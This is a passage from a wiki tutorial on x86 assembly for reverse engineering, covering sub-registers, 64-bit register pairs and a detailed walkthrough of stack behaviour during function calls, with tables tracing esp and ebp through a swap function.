<td width='100'>0x12345678</td><br />
</tr><br />
<tr><br />
<td>ax</td><br />
<td>0x5678</td><br />
</tr><br />
<tr><br />
<td>ah</td><br />
<td>0x56</td><br />
</tr><br />
<tr><br />
<td>al</td><br />
<td>0x78</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
<table border='1px' cellspacing='0' cellpadding='0'><br />
<tr><br />
<td width='50'>ebx</td><br />
<td width='100'>0x00000025</td><br />
</tr><br />
<tr><br />
<td>bx</td><br />
<td>0x0025</td><br />
</tr><br />
<tr><br />
<td>bh</td><br />
<td>0x00</td><br />
</tr><br />
<tr><br />
<td>bl</td><br />
<td>0x25</td><br />
</tr><br />
</table><br />
<br />
== 64-bit Registers ==<br />
<br />
A 64-bit register is made by concatenating a pair of 32-bit registers. This is shown by putting a colon between them. <br />
<br />
The most common 64-bit register (used for operations such as division and multiplication) is edx:eax. This means that the 32-bits of edx are put in front of the 32-bits of eax, creating a double-long register, so to speak. <br />
<br />
Here is a simple example:<br />
<table border='1px' cellspacing='0' cellpadding='0'><br />
<tr><br />
<td width='80'>edx</td><br />
<td width='200'>0x11223344</td><br />
</tr><br />
<tr><br />
<td>eax</td><br />
<td>0xaabbccdd</td><br />
</tr><br />
<tr><br />
<td>edx:eax</td><br />
<td>0x11223344aabbccdd</td><br />
</tr><br />
</table><br />
<br />
<br />
== Questions ==<br />
Feel free to edit this section and post questions, I'll do my best to answer them. But you may need to contact me to let me know that a question exists.</div>Killboyhttps://wiki.skullsecurity.org/index.php?title=The_Stack&diff=3137The Stack2012-01-16T00:41:18Z<p>Killboy: /* Frame Pointer */</p>
<hr />
<div>{{Infobox assembly}}<br />
<br />
The stack is, at best, a difficult concept to understand. However, understanding the stack is essential to reverse engineering code. <br />
<br />
The stack register, esp, is basically a register that points to an arbitrary location in memory called "the stack". The stack is just a really big section of memory where temporary data can be stored and retrieved. When a function is called, some stack space is allocated to the function, and when a function returns the stack should be in the same state it started in. <br />
<br />
The stack always grows downwards, towards lower values. The esp register always points to the lowest value on the stack. Anything below esp is considered free memory that can be overwritten. <br />
<br />
The stack stores function parameters, local variables, and the return address of every function. <br />
<br />
== Function Parameters ==<br />
When a function is called, its parameters are typically stored on the stack before making the call. Here is an example of a function call in C:<br />
func(1, 2, 3); <br />
And here is the equivalent call in assembly:<br />
push 3<br />
push 2<br />
push 1<br />
call func<br />
add esp, 0Ch<br />
<br />
The parameters are put on the stack, then the function is called. The function has to know it's getting 3 parameters, which is why function parameters have to be declared in C. <br />
<br />
After the function returns, the stack pointer is still 12 bytes ahead of where it started. In order to restore the stack to where it used to be, 12 (0x0c) has to be added to the stack pointer. The three pushes, of 4 bytes each, mean that a total of 12 was subtracted from the stack. <br />
<br />
Here is what the initial stack looked like (with ?'s representing unknown stack values):<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='75'>'''''esp'''''</td><br />
<td align='center' width='50'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
Note that the same 5 32-bit stack values are shown in all these examples, with the stack pointer at the left moved. The stack goes much further up and down, but that isn't shown here. <br />
<br />
Here are the three pushes:<br />
<br />
<br />
<br />
push 3<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='75'>esp + 4</td><br />
<td align='center' width='50'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>'''''esp'''''</td><br />
<td align='center'>3</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
push 2<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='75'>esp + 8</td><br />
<td align='center' width='50'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4</td><br />
<td align='center'>3</td><br />
</tr><br />
<tr><br />
<td align='left'>'''''esp'''''</td><br />
<td align='center'>2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
push 1<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='75'>esp + 12</td><br />
<td align='center' width='50'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 8</td><br />
<td align='center'>3</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4</td><br />
<td align='center'>2</td><br />
</tr><br />
<tr><br />
<td align='left'>'''''esp'''''</td><br />
<td align='center'>1</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
Now all three values are on the stack, and esp is pointing at the 1. The function is called, and returns, leaving the stack the way it started. Now the final instruction runs:<br />
<br />
<br />
<br />
add esp, 0Ch<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='75'>'''''esp'''''</td><br />
<td align='center' width='50'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4</td><br />
<td align='center'>3</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 8</td><br />
<td align='center'>2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>1</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
Note that the 3, 2, and 1 are still on the stack. However, they're below the stack pointer, which means that they are considered free memory and will be overwritten.<br />
<br />
== call and ret Revisited ==<br />
<br />
The ''call'' instruction pushes the address of the next instruction onto the stack, then jumps to the specified function. <br />
<br />
The ''ret'' instruction pops the next value off the stack, which should have been put there by a call, and jumps to it. <br />
<br />
Here is some example code:<br />
0x10000000 push 3<br />
0x10000001 push 2<br />
0x10000002 push 1<br />
0x10000003 call 0x10000020<br />
0x10000007 add esp, 12<br />
0x10000011 exit ; This isn't a real instruction, but pretend it is<br />
0x10000020 mov eax, 1<br />
0x10000024 ret<br />
<br />
Now here is what the stack looks like at each step in this code:<br />
<br />
<br />
<br />
0x10000000 push 3<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='75'>esp + 4</td><br />
<td align='center' width='50'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>'''''esp'''''</td><br />
<td align='center'>3</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 20</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x10000001 push 2<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='75'>esp + 8</td><br />
<td align='center' width='50'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4</td><br />
<td align='center'>3</td><br />
</tr><br />
<tr><br />
<td align='left'>'''''esp'''''</td><br />
<td align='center'>2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x10000002 push 1<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='75'>esp + 12</td><br />
<td align='center' width='50'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 8</td><br />
<td align='center'>3</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4</td><br />
<td align='center'>2</td><br />
</tr><br />
<tr><br />
<td align='left'>'''''esp'''''</td><br />
<td align='center'>1</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x10000003 call 0x10000020<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='75'>esp + 16</td><br />
<td align='center' width='50'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 12</td><br />
<td align='center'>3</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 8</td><br />
<td align='center'>2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4</td><br />
<td align='center'>1</td><br />
</tr><br />
<tr><br />
<td align='left'>'''''esp'''''</td><br />
<td align='center'>0x1000007</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x10000020 mov eax, 1<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='75'>esp + 16</td><br />
<td align='center' width='50'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 12</td><br />
<td align='center'>3</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 8</td><br />
<td align='center'>2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4</td><br />
<td align='center'>1</td><br />
</tr><br />
<tr><br />
<td align='left'>'''''esp'''''</td><br />
<td align='center'>0x1000007</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x10000024 ret<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='75'>esp + 12</td><br />
<td align='center' width='50'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 8</td><br />
<td align='center'>3</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4</td><br />
<td align='center'>2</td><br />
</tr><br />
<tr><br />
<td align='left'>'''''esp'''''</td><br />
<td align='center'>1</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>0x1000007</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x10000007 add esp, 12<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='75'>'''''esp'''''</td><br />
<td align='center' width='50'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>3</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>1</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16</td><br />
<td align='center'>0x1000007</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 20</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 24</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x10000011 exit ; This isn't a real instruction, but pretend it is<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='75'>'''''esp'''''</td><br />
<td align='center' width='50'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>3</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>1</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16</td><br />
<td align='center'>0x1000007</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 20</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 24</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
Note the return address being pushed onto the stack by call, and being popped off the stack by ret.<br />
<br />
== Saved Registers ==<br />
Some registers (ebx, edi, esi, ebp) are generally considered to be non-volatile. What that means is that when a function is called, those registers have to be saved. Typically, this is done by pushing them onto the stack at the start of a function, and popping them in reverse order at the end. Here is a simple example:<br />
<br />
; function test()<br />
push esi<br />
push edi<br />
.....<br />
pop edi<br />
pop esi<br />
ret<br />
<br />
== Local Variables ==<br />
<br />
At the beginning of most functions, space to store local variables in is allocated. This is done by subtracting the total size of all local variables from the stack pointer at the start of the function, then referencing them based on the stack. An example of this will be demonstrated in the following section. <br />
<br />
== Frame Pointer ==<br />
The frame pointer is the final piece to the puzzle. Unless a program has been optimized, ebp is set to point at the beginning of the local variables. The reason for this is that throughout a function, the stack changes (due to saving variables, making function calls, and others reasons), so keeping track of where the local variables are relative to the stack pointer is tricky. The frame pointer, on the other hand, is stored in a non-volatile register, ebp, so it never changed during the function. <br />
<br />
Here is an example of a swap function that uses two parameters passed on the stack and a local variable to store the interim result (if you don't fully understand this, don't worry too much -- I don't either. IDA tends to look after this kind of stuff for you automatically, so this is more theory than actual useful information. Please note that the virtual memory addresses have been modified for simplicity, in reality the addresses would increase based on the size of the previous operation):<br />
<br />
<pre><br />
0x400000 push ecx ; A pointer to an integer in memory - second parameter (param2)<br />
0x400001 push edx ; Another integer pointer - first parameter (param1)<br />
0x400002 call 0x401000 ; Call the swap function<br />
0x400003 add esp, 8 ; Balance the stack<br />
.....<br />
0x401000 ; function swap(int *a, int *b)<br />
0x401000 push ebp ; Preserve ebp.<br />
0x401001 mov ebp, esp ; Set up the frame pointer.<br />
0x401002 sub esp, 8 ; Make room for two local variables.<br />
0x401003 push esi ; Preserve esi on the stack.<br />
0x401004 push edi ; Preserve edi on the stack.<br />
<br />
0x401005 mov ecx, [ebp+8] ; Put param1 (a pointer) into ecx.<br />
0x401006 mov edx, [ebp+12] ; Put param2 (a pointer) into edx.<br />
<br />
0x401007 mov esi, [ecx] ; Dereference param1 to get the first value.<br />
0x401008 mov edi, [edx] ; Dereference param2 to get the second value.<br />
<br />
0x401009 mov [ebp-4], esi ; Store the first value as a local variable<br />
0x40100a mov [ebp-8], edi ; Store the second value as a local variable<br />
<br />
0x40100b mov esi, [ebp-8] ; Retrieve them in reverse<br />
0x40100c mov edi, [ebp-4]<br />
<br />
0x40100d mov [ecx], edi ; Put the first value into the second address (param2 = param1)<br />
0x40100e mov [edx], esi ; Put the second value into the first address (param1 = param2)<br />
<br />
0x40100f pop edi ; Restore the edi register<br />
0x401010 pop esi ; Restore the esi register<br />
0x401011 add esp, 8 ; Remove the local variables from the stack<br />
0x401012 pop ebp ; Restore ebp<br />
0x401013 ret ; Return (eax isn't set, so there's no return value)<br />
</pre><br />
<br />
(You can download the complete code to test this example in Visual Studio [[Stack_Example|here]].)<br />
<br />
<br />
<br />
Because this is such a complicated example, it's valuable to go through it step by step, keeping track of the stack (again, if you use IDA, the stack variables will automatically be identified, but you should still understand how this works):<br />
<br />
Initial stack:<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp - 4</td><br />
<td align='center' width='100'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 20</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 24</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 28</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 32</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 36</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x400000 push ecx ; A pointer to an integer in memory<br />
0x400001 push edx ; Another integer pointer<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp + 4</td><br />
<td align='center' width='100' style='color: red;'>param2</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: cyan'>'''''esp'''''</td><br />
<td align='center' style='color: red;'>param1</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 20</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 24</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 28</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x400002 call 0x401000 ; Call the swap function<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp + 8</td><br />
<td align='center' width='100'>param2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4</td><br />
<td align='center'>param1</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: cyan'>'''''esp'''''</td><br />
<td align='center' style='color: red;'>0x400003</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 20</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 24</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x401000 ; function swap(int *a, int *b)<br />
0x401000 push ebp ; Preserve ebp.<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp + 12</td><br />
<td align='center' width='100'>param2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 8</td><br />
<td align='center'>param1</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4</td><br />
<td align='center'>0x400003</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: cyan'>'''''esp'''''</td><br />
<td align='center' style='color: red;'>(ebp's value)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 20</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x401001 mov ebp, esp ; Set up the frame pointer.<br />
0x401002 sub esp, 8 ; Make room for two local variables.<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp + 20</td><br />
<td align='center' width='100'>param2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 16</td><br />
<td align='center'>param1</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 12</td><br />
<td align='center'>0x400003</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: yellow'>esp + 8, '''''ebp'''''</td><br />
<td align='center'>(previous ebp)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4</td><br />
<td align='center' style='color: red;'>(unused)</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: cyan'>'''''esp'''''</td><br />
<td align='center' style='color: red;'>(unused)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x401003 push esi ; Preserve esi on the stack.<br />
0x401004 push edi ; Preserve edi on the stack.<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp + 28, ''ebp + 12''</td><br />
<td align='center' width='100'>param2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 24, ''ebp + 8''</td><br />
<td align='center'>param1</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 20, ''ebp + 4''</td><br />
<td align='center'>0x400003</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: yellow'>esp + 16, '''''ebp'''''</td><br />
<td align='center'>(previous ebp)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 12, ''ebp - 4''</td><br />
<td align='center'>(unused)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 8, ''ebp - 8''</td><br />
<td align='center'>(unused)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4, ''ebp - 12''</td><br />
<td align='center' style='color: red;'>(esi)</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: cyan'>'''''esp''''', ''ebp - 16''</td><br />
<td align='center' style='color: red;'>(edi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4, ''ebp - 20''</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
Note how in the following section the variables are address based in the address of ebp. The first parameter is ebp + 8, which is 2 values above ebp on the stack, and the second is ebp + 12, which is 3 above ebp. Count them to confirm!<br />
<br />
0x401005 mov ecx, [ebp+8] ; Put the first parameter (a pointer) into ecx.<br />
0x401006 mov edx, [ebp+12] ; Put the second parameter (a pointer) into edx.<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp + 28, ''ebp + 12''</td><br />
<td align='center' width='100' style='color: green;'>param2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 24, ''ebp + 8''</td><br />
<td align='center' style='color: green;'>param1</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 20, ''ebp + 4''</td><br />
<td align='center'>0x400003</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: yellow'>esp + 16, '''''ebp'''''</td><br />
<td align='center'>(previous ebp)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 12, ''ebp - 4''</td><br />
<td align='center'>(unused)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 8, ''ebp - 8''</td><br />
<td align='center'>(unused)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4, ''ebp - 12''</td><br />
<td align='center'>(esi)</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: cyan'>'''''esp''''', ''ebp - 16''</td><br />
<td align='center'>(edi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4, ''ebp - 20''</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
<br />
These lines don't use the stack, so the table will be omitted:<br />
0x401007 mov esi, [ecx] ; Dereference param1 to get the first value.<br />
0x401008 mov edi, [edx] ; Dereference param2 to get the second value.<br />
<br />
<br />
<br />
<br />
0x401009 mov [ebp-4], esi ; Store the first value as a local variable<br />
0x40100a mov [ebp-8], edi ; Store the second value as a local variable<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp + 28, ''ebp + 12''</td><br />
<td align='center' width='100'>param2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 24, ''ebp + 8''</td><br />
<td align='center'>param1</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 20, ''ebp + 4''</td><br />
<td align='center'>0x400003</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: yellow'>esp + 16, '''''ebp'''''</td><br />
<td align='center'>(previous ebp)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 12, ''ebp - 4''</td><br />
<td align='center' style='color: red;'>esi (var1)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 8, ''ebp - 8''</td><br />
<td align='center' style='color: red;'>edi (var2)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4, ''ebp - 12''</td><br />
<td align='center'>(esi)</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: cyan'>'''''esp''''', ''ebp - 16''</td><br />
<td align='center'>(edi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4, ''ebp - 20''</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x40100b mov esi, [ebp-8] ; Retrieve them in reverse<br />
0x40100c mov edi, [ebp-4]<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp + 28, ''ebp + 12''</td><br />
<td align='center' width='100'>param2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 24, ''ebp + 8''</td><br />
<td align='center'>param1</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 20, ''ebp + 4''</td><br />
<td align='center'>0x400003</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: yellow'>esp + 16, '''''ebp'''''</td><br />
<td align='center'>(previous ebp)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 12, ''ebp - 4''</td><br />
<td align='center' style='color: green;'>esi (var1)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 8, ''ebp - 8''</td><br />
<td align='center' style='color: green;'>edi (var2)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4, ''ebp - 12''</td><br />
<td align='center'>(esi)</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: cyan'>'''''esp''''', ''ebp - 16''</td><br />
<td align='center'>(edi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4, ''ebp - 20''</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
<br />
0x40100d mov [ecx], edi ; Put the first value into the second address (param2 = param1)<br />
0x40100e mov [edx], esi ; Put the second value into the first address (param1 = param2)<br />
0x40100f pop edi ; Restore the edi register<br />
0x401010 pop esi ; Restore the esi register<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp + 20, ''ebp + 12''</td><br />
<td align='center' width='100'>param2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 16, ''ebp + 8''</td><br />
<td align='center'>param1</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 12, ''ebp + 4''</td><br />
<td align='center'>0x400003</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: yellow'>esp + 8, '''''ebp'''''</td><br />
<td align='center'>(previous ebp)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4, ''ebp - 4''</td><br />
<td align='center'>esi (var1)</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: cyan;'>'''''esp ''''', ''ebp - 8''</td><br />
<td align='center'>edi (var2)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4, ''ebp - 12''</td><br />
<td align='center' style='color: green;'>(esi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8, ''ebp - 16''</td><br />
<td align='center' style='color: green;'>(edi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12, ''ebp - 20''</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x401011 add esp, 8 ; Remove the local variables from the stack<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp + 12, ''ebp + 12''</td><br />
<td align='center' width='100'>param2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 8, ''ebp + 8''</td><br />
<td align='center'>param1</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4, ''ebp + 4''</td><br />
<td align='center'>0x400003</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: cyan'>'''''esp''''', '''''ebp'''''</td><br />
<td align='center'>(previous ebp)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4, ''ebp - 4''</td><br />
<td align='center'>esi (var1)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8, ''ebp - 8''</td><br />
<td align='center'>edi (var2)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12, ''ebp - 12''</td><br />
<td align='center'>(esi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16, ''ebp - 16''</td><br />
<td align='center'>(edi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 20, ''ebp - 20''</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x401012 pop ebp ; Restore ebp<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
